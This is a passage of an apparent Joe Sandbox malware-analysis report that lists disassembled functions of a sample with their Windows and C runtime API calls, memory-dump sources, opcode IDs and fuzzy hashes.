                                                                                              • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                              • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                              Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                              • __lock_file.LIBCMT ref: 00414A8D
                                                                                                • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                              • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2800547568-0
                                                                                              • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                              • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                              • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                              • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                              Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __lock_file.LIBCMT ref: 00415012
                                                                                              • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2999321469-0
                                                                                              • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                              • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                              • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                              • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                              Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4104443479-0
                                                                                              • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                              • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                              • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                              • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                              Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                              Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                              • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                              • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                              • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                              Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                              • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                              • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                              • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                              Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 3031932315-0
                                                                                              • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                              • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                              • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                              • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                              Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                              • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                              • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                              • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                              Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wfsopen
                                                                                              • String ID:
                                                                                              • API String ID: 197181222-0
                                                                                              • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                              • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                              • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                              • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                              Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                              • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                              • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                              • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                              Function 0473807C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 04738091
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                              • Instruction ID: 3f3bdc1c8c4ae54146c00217ef80f19ed37f40ad1c838fd14fa7bfc8f25ee2d1
                                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                              • Instruction Fuzzy Hash: 04E0BF7494010DEFDB10EFA8D9496DE7BB4EF04302F1005A1FD05D7681DB309E548A72
                                                                                              Function 04738080 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 04738091
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                              • Instruction ID: d5f547f0214a6d6c0b51910a5cb5e82406d0de85bc19baf663d0646d5c5b348b
                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                              • Instruction Fuzzy Hash: 42E0E67494010DDFDB00EFB8D94969E7FF4EF04302F100561FD01D2281D6309D508A72

                                                                                              Non-executed Functions

                                                                                              Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                              • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                              • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                              • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                              • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                              • SendMessageW.USER32 ref: 0047CA7F
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(009714F8,00000000,00000000,00000000), ref: 0047CB9B
                                                                                              • ImageList_BeginDrag.COMCTL32(009714F8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                              • SetCapture.USER32(?), ref: 0047CBB6
                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                              • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                              • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                              • SendMessageW.USER32 ref: 0047CD12
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                              • SendMessageW.USER32 ref: 0047CD80
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                              • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                              • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                              • SendMessageW.USER32 ref: 0047CE93
                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,02E91B00,00000000,?,?,?,?), ref: 0047CF1C
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                              • SendMessageW.USER32 ref: 0047CF6B
                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,02E91B00,00000000,?,?,?,?), ref: 0047CFE6
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3100379633-4164748364
                                                                                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                              Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00434420
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                              • IsIconic.USER32(?), ref: 0043444F
                                                                                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                              • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 2889586943-2988720461
                                                                                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
